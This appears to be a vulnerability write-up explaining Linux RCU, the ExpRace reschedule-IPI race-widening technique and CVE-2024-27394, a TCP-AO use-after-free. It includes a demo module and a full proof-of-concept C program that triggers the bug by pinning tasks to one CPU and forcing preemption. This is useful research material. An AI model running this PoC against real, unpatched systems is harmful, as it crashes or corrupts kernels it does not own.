Read-Copy-Update (RCU)

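This post covers only Tree RCU, the flavor relevant to the vulnerability; among the various RCU implementations it is the one selected by the CONFIG_TREE_RCU option. If you already know RCU, feel free to skip this part.
First, let's look at Read-Copy-Update (RCU) and how its API is used.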

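RCU is a synchronization mechanism for read-mostly workloads. Conventional locks (mutexes, spinlocks, and so on) block readers while a write is in progress, whereas RCU lets reads and writes run concurrently, which keeps overhead* to a minimum.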

Overhead: the extra cost incurred in performing some operation

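RCU splits an update into three phases: Removal, Grace Period, and Reclamation. In the removal phase, the pointer to the old data is removed so that later readers can no longer reach the old data structure. The updater then waits until every reader that might still hold the old pointer has finished (the grace period). Finally, the reclamation phase destroys the old data. When the API is used correctly, RCU defers kfree() until no reader can still be using the structure, which is what prevents Use-After-Free (UAF) bugs.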

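The grace period is the time spent waiting for every read that may have referenced the old data structure to finish. It matters because readers running concurrently on other CPUs could otherwise still be using memory that has already been reclaimed.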
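The three phases can be sketched as a single-threaded userspace toy. This is not kernel code and not how Tree RCU is implemented: every name below (toy_read_lock, toy_update, and so on) is made up for illustration, and the model is deliberately conservative in that it waits for all readers, while real RCU only waits for readers that started before the removal.

```c
#include <assert.h>
#include <stdlib.h>

struct item { int a; };

static struct item *current_item;  /* what new readers will see */
static struct item *retired_item;  /* removed, waiting for the grace period */
static int active_readers;         /* readers inside a critical section */
static int reclaimed_count;        /* old copies freed so far */

/* Reclamation: only allowed once no reader can still hold the old copy. */
static void toy_try_reclaim(void)
{
    if (retired_item != NULL && active_readers == 0) {
        free(retired_item);
        retired_item = NULL;
        reclaimed_count++;
    }
}

static const struct item *toy_read_lock(void)
{
    active_readers++;
    return current_item;
}

static void toy_read_unlock(void)
{
    assert(active_readers > 0);
    active_readers--;
    toy_try_reclaim();   /* the grace period may end here */
}

/* Removal: publish a new copy and retire the old one. Returns 0 on success. */
static int toy_update(int a)
{
    struct item *fresh = malloc(sizeof(*fresh));

    if (fresh == NULL)
        return -1;
    fresh->a = a;
    assert(retired_item == NULL);  /* toy limit: one retired copy at a time */
    retired_item = current_item;
    current_item = fresh;
    toy_try_reclaim();
    return 0;
}
```

A reader that called toy_read_lock() before toy_update() keeps a valid pointer to the old copy until it calls toy_read_unlock(); only then is the old copy freed.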

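Let's go through the main RCU API with examples. On the read side, rcu_read_lock()/rcu_read_unlock() mark the read-side critical section. Marking it tells RCU that a read is in progress, so the data being referenced is not reclaimed until the section ends. In addition, an RCU-protected pointer must be dereferenced through an API such as rcu_dereference(), which provides the required memory ordering (this is part of what keeps UAF from happening):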

int example_reader(void) {
    int val;

    rcu_read_lock();
    val = rcu_dereference(global_ptr)->a;
    rcu_read_unlock();
    return val;
}

When CONFIG_PREEMPT_RCU is not set in the kernel, rcu_read_lock() calls preempt_disable() to disable preemption. When CONFIG_PREEMPT_RCU is set, rcu_read_lock() does not disable preemption; it increments current->rcu_read_lock_nesting by one instead. The kernel affected by this vulnerability had CONFIG_PREEMPT_RCU enabled.

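CONFIG_PREEMPT_RCU: a kernel configuration option that decides whether preemption is allowed inside RCU read-side critical sections
current->rcu_read_lock_nesting: a field that records the nesting depth of rcu_read_lock() calls in the current task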
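The nesting counter can be modeled in a few lines of userspace C. The struct and function names here are hypothetical stand-ins, not the kernel's definitions; the sketch only shows the bookkeeping idea that a task counts as being inside a read-side critical section while its depth is non-zero.

```c
#include <assert.h>

/* Hypothetical stand-in for the one task_struct field that matters here. */
struct toy_task {
    int rcu_read_lock_nesting;
};

static void toy_rcu_read_lock(struct toy_task *t)
{
    t->rcu_read_lock_nesting++;
}

static void toy_rcu_read_unlock(struct toy_task *t)
{
    assert(t->rcu_read_lock_nesting > 0);  /* an unbalanced unlock is a bug */
    t->rcu_read_lock_nesting--;
}

/* A grace period has to wait for this task while the depth is non-zero. */
static int toy_in_read_side_cs(const struct toy_task *t)
{
    return t->rcu_read_lock_nesting > 0;
}
```

The consequence that matters later in this post: a task that is preempted while its depth is 0 does nothing to hold back the grace period.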

Next, an updater must not modify an RCU-protected data structure in place. It should allocate a new structure, fill it in, and then use rcu_assign_pointer() to replace the old one. The replacement itself must be done under a traditional lock (a spinlock, a mutex, or similar) that marks the update-side critical section; otherwise concurrent updaters can race with each other:

Update-side critical section: the region of code that performs the update

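/* Assumed definitions (the original omits them), shared by the examples in this section. */
struct example {
        int a;
        struct list_head list;
        struct rcu_head rcu;
};
static struct example __rcu *global_ptr;
static LIST_HEAD(global_list);
static DEFINE_SPINLOCK(global_lock);

void example_reclaim(struct rcu_head *head) {
        struct example *old = container_of(head, struct example, rcu);

        kfree(old);
}

void example_updater(int a) {
        struct example *new;
        struct example *old;

        new = kzalloc(sizeof(*new), GFP_KERNEL);
        if (!new)
                return;
        new->a = a; /* fill in the copy before publishing it */

        spin_lock(&global_lock); /* start of the update-side critical section */
        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        rcu_assign_pointer(global_ptr, new);
        spin_unlock(&global_lock); /* end of the update-side critical section */

        if (old) /* nothing to reclaim on the very first update */
                call_rcu(&old->rcu, example_reclaim);
}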

In the code above, call_rcu() registers a callback (example_reclaim) that is invoked once every pre-existing read-side critical section has finished, that is, once the grace period has ended. The registered reclamation callback typically runs in softirq context.
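The reclaim callback only receives a pointer to the embedded rcu_head, so it has to recover the enclosing object with container_of(). Here is a userspace sketch of that pointer arithmetic. The toy_ names are invented for illustration, toy_call_rcu() runs the callback immediately instead of waiting for a grace period, and the kernel's real container_of() macro performs additional type checking.

```c
#include <assert.h>
#include <stddef.h>

struct toy_rcu_head {
    void (*func)(struct toy_rcu_head *head);
};

struct example {
    int a;
    struct toy_rcu_head rcu;   /* embedded, like struct rcu_head */
};

/* Step back from the member's address to the start of the enclosing struct. */
#define toy_container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

static int last_reclaimed_a = -1;

static void example_reclaim(struct toy_rcu_head *head)
{
    struct example *old = toy_container_of(head, struct example, rcu);

    last_reclaimed_a = old->a;  /* the kernel version would kfree(old) here */
}

/* Stand-in for call_rcu(): no grace period, the callback runs right away. */
static void toy_call_rcu(struct toy_rcu_head *head,
                         void (*func)(struct toy_rcu_head *head))
{
    assert(head != NULL && func != NULL);
    head->func = func;
    head->func(head);
}
```

Embedding the head inside the object is what lets call_rcu() queue arbitrary objects without allocating anything extra.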

Softirq: one of the interrupt-handling mechanisms in the Linux kernel; deferred, software-driven interrupt processing that runs after the hardware interrupt handler

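In the example above, example_reader() and example_updater() can run concurrently without a race condition. example_reader() obtains either the original object or the new copy from global_ptr. Even if it gets the original, it is safe, because the original is kfree()'d only after every read-side critical section that could reference it has ended.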

Now for the list-related RCU API. list_add_rcu() adds a node to a list, the list_for_each_entry_rcu macro traverses a list, and list_del_rcu() removes a node. A usage example:

void example_add(int a) {
        struct example *node;
 
        node = kzalloc(sizeof(*node), GFP_KERNEL);
        if (!node)
                return;
        node->a = a;
 
        spin_lock(&global_lock);
        list_add_rcu(&node->list, &global_list);
        spin_unlock(&global_lock);
}
 
void example_iterate(void) {
        struct example *node;
 
        rcu_read_lock();
        list_for_each_entry_rcu(node, &global_list, list) {
                pr_info("Value: %d\n", node->a);
        }
        rcu_read_unlock();
}
 
void example_del(void) {
        struct example *node, *tmp;
        
        spin_lock(&global_lock);
 
        list_for_each_entry_safe(node, tmp, &global_list, list) {
                list_del_rcu(&node->list);
                call_rcu(&node->rcu, example_reclaim);
        }
        
        spin_unlock(&global_lock);
}

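The three functions above can run concurrently without a race condition. list_add_rcu() is a write, so it needs a spinlock to form an update-side critical section. list_for_each_entry_rcu, in turn, must only be used inside a read-side critical section protected by rcu_read_lock(). example_del() removes nodes while it iterates, so it holds the same spinlock and uses list_for_each_entry_safe.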

Hash-linked lists (hlist) offer a similar API, including hlist_add_head_rcu(), hlist_for_each_entry_rcu, and hlist_del_rcu(). Their usage and caveats are the same as for the list API.

ExpRace

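Race-condition vulnerabilities in the Linux kernel usually occur between two or more functions of the same subsystem, for example between ioctl() and write(), or between gc and sendmsg(). CVE-2024-27394 is a little different. One of the two racing parties is the callback registered with call_rcu(), whose timing the user cannot control directly. On top of that, the race window is very narrow, which makes it tricky.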

So, to exploit this vulnerability, the technique from the ExpRace paper, accepted at USENIX Security '21, was used.

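The paper describes techniques that use indirect interrupt generation to widen the race window and make exploits more reliable. One of them relies on the Reschedule Inter-Processor Interrupt (Reschedule IPI), an interrupt that one CPU sends to another when a task has to be moved to a specific processor or when work is being balanced across processors. A user can cause a Reschedule IPI through the sched_setaffinity system call.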

Reschedule IPI: an interrupt raised when tasks are moved between CPUs or scheduling is adjusted

Let's briefly look at how to use the technique. Below is an example kernel module, in which example_open() is called via open().

static int example_open(struct inode *inode, struct file *file);
 
struct file_operations example_fops = {
        .open       = example_open,
};
 
static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};
 
static int example_open(struct inode *inode, struct file *file) {
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");
 
        return 0;
}
 
static int example_init(void) {
        int result;
 
        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }
 
        return 0;
}
 
static void example_exit(void) {
        misc_deregister(&example_driver);
}
 
module_init(example_init);
module_exit(example_exit);

How can a delay be introduced between printk("Step 2") and printk("Step 3") in example_open()? By calling the sched_setaffinity system call (the following code is based on the sample code from the ExpRace paper):

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;
        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);
 
        // a pid of 0 means the calling thread
        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                err(1, "affinity");
}
 
void *target_thread(void *arg)
{
        int fd;

        // Suppose that a victim thread is running on core 2.
        pin_this_task_to(2);
        while (1) {
                fd = open("/dev/example", O_RDWR);
                if (fd >= 0)
                        close(fd); // do not run out of file descriptors
        }
}
 
int main()
{
        pthread_t thr;
 
        pthread_create(&thr, NULL, target_thread, NULL);
 
        // Send rescheduling IPI to core 2 to extend the race window.
        pin_this_task_to(2);
        ...

A thread, target_thread, is created; it calls pin_this_task_to(2) to pin itself to CPU #2 and then calls open() on the example module in a loop. As a result, example_open() runs over and over on CPU #2.
The parent thread then calls pin_this_task_to(2). If the Reschedule IPI caused by the parent arrives on CPU #2 right after printk("Step 2") has returned in target_thread, the interrupt leads to the parent thread being moved onto CPU #2. target_thread is therefore paused between printk("Step 2") and printk("Step 3").
Once the Reschedule IPI has been handled and target_thread is scheduled again, the remaining printk("Step 3") and printk("Step 4") run.

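After running this code and checking the kernel log, the output in my case started from Step 4 for some reason, but a very large delay is visible between Step 4 and the following Step 1. That is because the task was forcibly preempted right after Step 4 by the Reschedule IPI the user triggered.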
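Rather than eyeballing the log, the delay can be computed by subtracting the timestamps of two log lines. The helpers below are a userspace sketch that assumes the default dmesg prefix of the form [seconds.microseconds]; the function names are made up for illustration and are not part of any tool.

```c
#include <assert.h>
#include <stdio.h>

/* Parse "[  123.456789] text" into microseconds since boot; -1 on mismatch. */
static long long dmesg_ts_usec(const char *line)
{
    long long sec, usec;

    assert(line != NULL);
    if (sscanf(line, "[%lld.%6lld]", &sec, &usec) != 2)
        return -1;
    return sec * 1000000LL + usec;
}

/* Gap in microseconds between two log lines; -1 if either fails to parse. */
static long long dmesg_gap_usec(const char *earlier, const char *later)
{
    long long a = dmesg_ts_usec(earlier);
    long long b = dmesg_ts_usec(later);

    if (a < 0 || b < 0)
        return -1;
    return b - a;
}
```

Feeding it consecutive "Step" lines makes the stretched gap stand out against the gaps between the other steps.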

example_module.c

#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
 
 
static int example_open(struct inode *inode, struct file *file);
 
struct file_operations example_fops = {
        .open       = example_open,
};
 
static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};
 
static int example_open(struct inode *inode, struct file *file) {
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");
 
        return 0;
}
 
static int example_init(void) {
        int result;
 
        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }
 
        return 0;
}
 
static void example_exit(void) {
        misc_deregister(&example_driver);
}
 
module_init(example_init);
module_exit(example_exit);
 
MODULE_LICENSE("GPL");
MODULE_AUTHOR("d0razi");
MODULE_DESCRIPTION("Example Kernel Module for Reschedule IPI Test");

test.c

 
#define _GNU_SOURCE
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
 
void pin_this_task_to(int cpu)
{
    cpu_set_t cset;
    CPU_ZERO(&cset);
    CPU_SET(cpu, &cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
        err(1, "affinity");
}
 
void* target_thread(void *arg)
{
    int fd, cnt=0;
 
    while(cnt < 10) {
        pin_this_task_to(2);
        fd = open("/dev/example", O_RDWR);
        if (fd >= 0)
            close(fd);
        cnt++;
    }
    return NULL;
}
 
int main() {
    pthread_t thr;
 
    pthread_create(&thr, NULL, target_thread, NULL);
 
    pin_this_task_to(2);
 
    pthread_join(thr, NULL);
 
    return 0;
}

Makefile

obj-m += example_module.o
 
ccflags-y := -Wno-error
 
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

In other words, this technique makes it possible to preempt a task at a particular point and keep it off the CPU for longer than an RCU grace period.

Of course, the user cannot control exactly when the preemption happens, so the task has to be repeated until it is preempted at the desired point.
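Because the attempt has to be repeated many times, it helps to confirm up front that the target CPU can actually be used, since the snippets above hard-code a CPU number. Below is a small sketch, with hypothetical helper names, that reads the calling thread's allowed CPUs with sched_getaffinity() and reports a pinning failure to the caller instead of exiting.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Return the lowest CPU number this thread may run on, or -1 on error. */
static int first_allowed_cpu(void)
{
    cpu_set_t set;

    if (sched_getaffinity(0, sizeof(set), &set) != 0)
        return -1;
    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++)
        if (CPU_ISSET(cpu, &set))
            return cpu;
    return -1;
}

/* Pin the calling thread to `cpu`; returns 0 on success, -1 with errno set. */
static int try_pin_to(int cpu)
{
    cpu_set_t set;

    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}
```

On a machine or container where CPU #2 is not available, try_pin_to(2) returns -1 and the caller can pick another CPU rather than looping on a pin that never takes effect.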

CVE-2024-27394: TCP Authentication Option Use-After-Free Vulnerability

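The TCP Authentication Option (TCP-AO) is a TCP option designed to strengthen the security of TCP connections. It replaces the older TCP MD5 signature option and verifies the integrity and authenticity of the data sent over a TCP connection.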

CVE-2024-27394 occurs in tcp_ao_connect_init() in net/ipv4/tcp_ao.c. The function runs when a user calls connect() on an IPv4 TCP socket, with the following call stack:

connect()
  => __sys_connect()
    => __sys_connect_file()
      => inet_stream_connect()
        => __inet_stream_connect()
          => tcp_v4_connect()
            => tcp_connect()
              => tcp_connect_init()
                => tcp_ao_connect_init()

The function is therefore called while the connection is being set up, regardless of whether the connection to the peer succeeds.

Peer: one of the two devices communicating with each other on an equal footing

To prune keys that are not valid for the TCP-AO connection, tcp_ao_connect_init() walks the entries with hlist_for_each_entry_rcu and releases the keys that do not match the peer. The use of call_rcu() looks safe, but the problem is that tcp_ao_connect_init() is not inside an RCU read-side critical section.

void tcp_ao_connect_init(struct sock *sk)
{
	struct tcp_sock *tp = tcp_sk(sk);
	struct tcp_ao_info *ao_info;
	union tcp_ao_addr *addr;
	struct tcp_ao_key *key;
	int family, l3index;
 
	ao_info = rcu_dereference_protected(tp->ao_info,
					    lockdep_sock_is_held(sk));
	if (!ao_info)
		return;

	/* Remove all keys that don't match the peer */
	family = sk->sk_family;
	if (family == AF_INET)
		addr = (union tcp_ao_addr *)&sk->sk_daddr;
#if IS_ENABLED(CONFIG_IPV6)
	else if (family == AF_INET6)
		addr = (union tcp_ao_addr *)&sk->sk_v6_daddr;
#endif
	else
		return;
	l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
						 sk->sk_bound_dev_if);
 
	hlist_for_each_entry_rcu(key, &ao_info->head, node) {    // <==[2]
		if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
			continue;
 
		if (key == ao_info->current_key)
			ao_info->current_key = NULL;
		if (key == ao_info->rnext_key)
			ao_info->rnext_key = NULL;
		hlist_del_rcu(&key->node);
		atomic_sub(tcp_ao_sizeof_key(key), &sk->sk_omem_alloc);
		call_rcu(&key->rcu, tcp_ao_key_free_rcu);    // <==[1]
	}
}

If the RCU grace period completes after the call_rcu() call [1] and tcp_ao_key_free_rcu() runs and frees the key, the loop, which keeps iterating, touches the freed key again to fetch the next entry, and a Use-After-Free occurs.

ao_info and key [2] can be allocated from user space by calling setsockopt() with the TCP_AO_ADD_KEY command:

int tcp_parse_ao(struct sock *sk, int cmd, unsigned short int family,
                 sockptr_t optval, int optlen)
{
        if (WARN_ON_ONCE(family != AF_INET && family != AF_INET6))
                return -EAFNOSUPPORT;
 
        switch (cmd) {
        case TCP_AO_ADD_KEY:
                return tcp_ao_add_cmd(sk, family, optval, optlen);    // <==[3]
        case TCP_AO_DEL_KEY:
                return tcp_ao_del_cmd(sk, family, optval, optlen);
        case TCP_AO_INFO:
                return tcp_ao_info_cmd(sk, family, optval, optlen);
        default:
                WARN_ON_ONCE(1);
                return -EINVAL;
        }
}

When setsockopt() is called with the TCP_AO_ADD_KEY command, tcp_ao_add_cmd() is invoked [3].

If this is the first time the command is used on the TCP socket, ao_info is allocated and stored in tcp_sk(sk)->ao_info [4].

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{       
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);
 
        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {
        
        ...
        
        if (first) {
                if (!static_branch_inc(&tcp_ao_needed.key)) {
                        ret = -EUSERS;
                        goto err_free_sock;
                }
                sk_gso_disable(sk);
                rcu_assign_pointer(tcp_sk(sk)->ao_info, ao_info);    // <==[4]
        }

This means that each TCP socket has its own ao_info. After that, a key is allocated and linked to ao_info [5]:

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{                
        ...
        key = tcp_ao_key_alloc(sk, &cmd);
        if (IS_ERR(key)) {
                ret = PTR_ERR(key);
                goto err_free_ao;
        }
 
        INIT_HLIST_NODE(&key->node);
        memcpy(&key->addr, addr, (family == AF_INET) ? sizeof(struct in_addr) :
                                                       sizeof(struct in6_addr));
        key->prefixlen  = cmd.prefix;
        key->family     = family;
        key->keyflags   = cmd.keyflags;
        key->sndid      = cmd.sndid;
        key->rcvid      = cmd.rcvid;
        key->l3index    = l3index;
        atomic64_set(&key->pkt_good, 0);
        atomic64_set(&key->pkt_bad, 0);
 
        ret = tcp_ao_parse_crypto(&cmd, key);
        if (ret < 0)
                goto err_free_sock;
 
        if (!((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE))) {
                tcp_ao_cache_traffic_keys(sk, ao_info, key);
                if (first) {
                        ao_info->current_key = key;
                        ao_info->rnext_key = key;
                }
        }
 
        tcp_ao_link_mkt(ao_info, key);    // <==[5]

tcp_ao_link_mkt(): adds a newly created TCP-AO key to the socket's list of authentication keys

In tcp_ao_add_cmd(), a new key is allocated and initialized. The key holds user-specified values such as sndid and rcvid as well as the secret key string, and is then linked into ao_info->head.

sndid: SendID, the key ID carried in outgoing segments
rcvid: RecvID, the key ID matched against incoming segments

This is all the setup needed to reach the vulnerable hlist_for_each_entry_rcu loop in tcp_ao_connect_init(). To trigger the vulnerability, call_rcu() has to be reached first. The RCU grace period must then end, at which point the tcp_ao_key_free_rcu() callback runs and the key is freed.

However, it is very rare for the RCU grace period to end on its own right after call_rcu(). To trigger the vulnerability reliably, the Reschedule IPI technique is needed. The trigger scenario looks like this:

               cpu0                                        cpu1
     
     setsockopt(A, TCP_AO_ADD_KEY)
       key = tcp_ao_key_alloc()    // key alloc
     
     sched_setaffinity(0)
     connect(A)
       tcp_ao_connect_init(A)
         hlist_for_each_entry_rcu {
         call_rcu(key)
                                                   sched_setaffinity(0)
                                                   [ Send Reschedule IPI to cpu0 ]
     [ connect(A) is preempted ]
     connect(B)
       ...
       
     [ End of RCU Grace Period ]
     __do_softirq(A)
       rcu_core(A)
         tcp_ao_key_free_rcu(A)
           kfree(key)    // key freed
       
     [ Returning to connect(A) ]
         hlist_for_each_entry_rcu {
           key->next    // UAF

setsockopt(TCP_AO_ADD_KEY) is called to allocate ao_info and keys for a TCP socket; at least two keys are allocated.
The process then pins itself to CPU #0 and calls connect(), which reaches tcp_ao_connect_init(), where call_rcu() is executed.
Another process then calls sched_setaffinity(0), sending a Reschedule IPI to CPU #0, so that the process running tcp_ao_connect_init() is preempted right after call_rcu() returns.
When the RCU grace period ends, the tcp_ao_key_free_rcu() callback registered by call_rcu() runs, and the key is kfree()'d.
When the preempted process resumes in tcp_ao_connect_init(), hlist_for_each_entry_rcu accesses the already kfree()'d key, which is the UAF.

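To raise the chance that tcp_ao_connect_init() is preempted at the right moment while it iterates with hlist_for_each_entry_rcu, several keys should be linked during setup. However, the number of keys that can be linked is limited by the requirement that sndid and rcvid be unique. These fields are of type u8, so at most 256 unique keys can be linked to one ao_info.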

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);
 
        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {    // <==[6]
                /* Check that neither RecvID nor SendID match any
                 * existing key for the peer, RFC5925 3.1:
                 * > The IDs of MKTs MUST NOT overlap where their
                 * > TCP connection identifiers overlap.
                 */
                if (__tcp_ao_do_lookup(sk, l3index, addr, family, cmd.prefix, -1, cmd.rcvid))
                        return -EEXIST;
                if (__tcp_ao_do_lookup(sk, l3index, addr, family,
                                       cmd.prefix, cmd.sndid, -1))
                        return -EEXIST;
        }

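If ao_info has already been allocated, tcp_ao_add_cmd() checks the sndid and rcvid of the existing keys [6]. If the sndid or rcvid supplied by the user in the request overlaps with an existing key for the peer, the request is rejected with -EEXIST. The number of keys that can be linked is therefore bounded by the range of the u8 members sndid and rcvid, 0 to 255. In other words, at most 256 keys can be linked to one ao_info: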

struct tcp_ao_key {
        ...
        u8                      sndid;
        u8                      rcvid;
        ...
};

Here is the proof-of-concept code:

#define _GNU_SOURCE
 
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <string.h>
#include <time.h>
#include <errno.h>
#include <inttypes.h>
#include <ctype.h>
#include <sys/types.h>
#include <math.h>
#include <poll.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <linux/in.h>
#include <linux/socket.h>
#include <signal.h>
#include <pthread.h>
 
#define PORT 8080
#define TCP_AO_ADD_KEY 38
#define TCP_AO_MAXKEYLEN 80
 
#define DEFAULT_TEST_PASSWORD "In this hour, I do not believe that any darkness will endure."
#define DEFAULT_TEST_ALGO "cmac(aes128)"
#define TCP_AO_KEYF_IFINDEX (1 << 0)
 
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
struct tcp_ao_add {
    /* setsockopt(TCP_AO_ADD_KEY) */
    struct __kernel_sockaddr_storage addr; /* peer's address for the key */
    char alg_name[64]; /* crypto hash algorithm to use */
    __s32 ifindex; /* L3 dev index for VRF */
    __u32 set_current: 1, /* set key as Current_key at once */
        set_rnext: 1, /* request it from peer with RNext_key */
        reserved: 30; /* must be 0 */
    __u16 reserved2; /* padding, must be 0 */
    __u8 prefix; /* peer's address prefix */
    __u8 sndid; /* SendID for outgoing segments */
    __u8 rcvid; /* RecvID to match for incoming seg */
    __u8 maclen; /* length of authentication code (hash) */
    __u8 keyflags; /* see TCP_AO_KEYF_ */
    __u8 keylen; /* length of ::key */
    __u8 key[TCP_AO_MAXKEYLEN];
}
__attribute__((aligned(8)));
 
struct sockaddr_in serv_addr;
 
void pin_this_task_to(int cpu) {
    cpu_set_t cset;
    CPU_ZERO( & cset);
    CPU_SET(cpu, & cset);
 
    if (sched_setaffinity(0, sizeof(cpu_set_t), & cset))
        perror("affinity");
}
 
int random_val(int a, int b) {
    static int seeded;

    /* Seed once: reseeding on every call repeats the same value within a second. */
    if (!seeded) {
        srand(time(NULL));
        seeded = 1;
    }

    return rand() % (b - a + 1) + a;
}
 
void ao_add_key(int sock, __u8 prefix, __u8 sndid, __u8 rcvid, __u32 saddr) {
    struct tcp_ao_add * ao;
    struct sockaddr_in addr = {};
 
    ao = (struct tcp_ao_add * ) malloc(sizeof( * ao));
    memset(ao, 0, sizeof( * ao));
 
    ao -> set_current = !!0;
    ao -> set_rnext = !!0;
    ao -> prefix = prefix;
    ao -> sndid = sndid;
    ao -> rcvid = rcvid;
    ao -> maclen = 0;
    ao -> keyflags = 0;
    ao -> keylen = 16;
    ao -> ifindex = 0;
 
    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = saddr;
 
    strncpy(ao -> alg_name, DEFAULT_TEST_ALGO, 64);
 
    memcpy( & ao -> addr, & addr, sizeof(struct sockaddr_in));
 
    memcpy(ao -> key, "1234567890123456", 16);
 
    if (setsockopt(sock, IPPROTO_TCP, TCP_AO_ADD_KEY, ao, sizeof( * ao)) < 0) {
        perror("setsockopt TCP_AO_ADD_KEY failed");
        close(sock);
        exit(EXIT_FAILURE);
    }
 
    free(ao);
}
 
void add_key(int sock) {
    ao_add_key(sock, 0, 0, 0, 0);
 
    for (int i = 1; i < KEY_COUNT; i++) {
        ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
    }
}
 
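void *ao_connect(void *arg) {
    int *socks = arg; /* one row of SOCK_COUNT sockets */
    pid_t pid;

    for (int i = 0; i < SOCK_COUNT; i++) {
        pid = fork();
        if (pid == 0) {
            pin_this_task_to(0);

            if (connect(socks[i], (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0) {
                printf("\nConnection Failed \n");
                exit(EXIT_FAILURE);
            }
            exit(EXIT_SUCCESS); /* the child must not fall back into the loop */
        } else if (pid > 0) { /* skip on fork failure: kill(-1, ...) would signal every process */
            usleep(random_val(50000, 100000));
            kill(pid, SIGKILL);
            waitpid(pid, NULL, 0);
        }
    }
    return NULL;
}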
 
int main() {
    pid_t pid;
 
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(PORT);
    if (inet_pton(AF_INET, "127.0.0.1", & serv_addr.sin_addr) <= 0) {
        printf("\nInvalid address/ Address not supported \n");
        exit(EXIT_FAILURE);
    }
 
    while (1) {
        pid = fork();
        if (pid == 0) {
            int socks[LOOP_COUNT][SOCK_COUNT];
            pthread_t thr[LOOP_COUNT];
 
            for (int i = 0; i < LOOP_COUNT; i++) {
                for (int j = 0; j < SOCK_COUNT; j++) {
                    if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                        printf("\n Socket creation error \n");
                        exit(EXIT_FAILURE);
                    }
                    add_key(socks[i][j]);
                }
            }
 
            for (int i = 0; i < LOOP_COUNT; i++)
                pthread_create( & thr[i], NULL, ao_connect, socks[i]);
 
            sleep(15);
            exit(0);
        } else {
            int status;
 
            waitpid(pid, & status, 0);
            usleep(100000); /* sleep(0.1) truncates to sleep(0) */
        }
    }
 
    return 0;
}

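Let's walk through the PoC piece by piece. It first creates 1000 TCP sockets (LOOP_COUNT x SOCK_COUNT = 5 x 200) and calls add_key() on each of them to allocate ao_info and link keys to it; with KEY_COUNT set to 255, add_key() links 255 keys per socket, close to the 256-key limit. Doing this up front avoids unnecessary allocation work later, while the preemption is being attempted.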

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
void add_key(int sock) {
    ao_add_key(sock, 0, 0, 0, 0);
 
    for (int i = 1; i < KEY_COUNT; i++) {
        ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
    }
}
 
int main() {
        ...
        while (1) {
            pid = fork();
            if (pid == 0) {
                int socks[LOOP_COUNT][SOCK_COUNT];
                pthread_t thr[LOOP_COUNT];
 
                for (int i = 0; i < LOOP_COUNT; i++) {
                    for (int j = 0; j < SOCK_COUNT; j++) {
                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                            printf("\n Socket creation error \n");
                            exit(EXIT_FAILURE);
                        }
                        add_key(socks[i][j]);
                    }
                }

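Next, five ao_connect threads are created and started. For each of its sockets, an ao_connect thread forks a child that first calls pin_this_task_to(0) to pin its subsequent work to CPU #0. The child then calls connect() on a TCP socket whose keys were linked in the preparation step, which triggers tcp_ao_connect_init(). The 1000 sockets are split across five threads so that, as they call pin_this_task_to(0), the five ao_connect threads keep sending Reschedule IPIs while hlist_for_each_entry_rcu is being traversed and keep preempting one another.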

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
 
void pin_this_task_to(int cpu) {
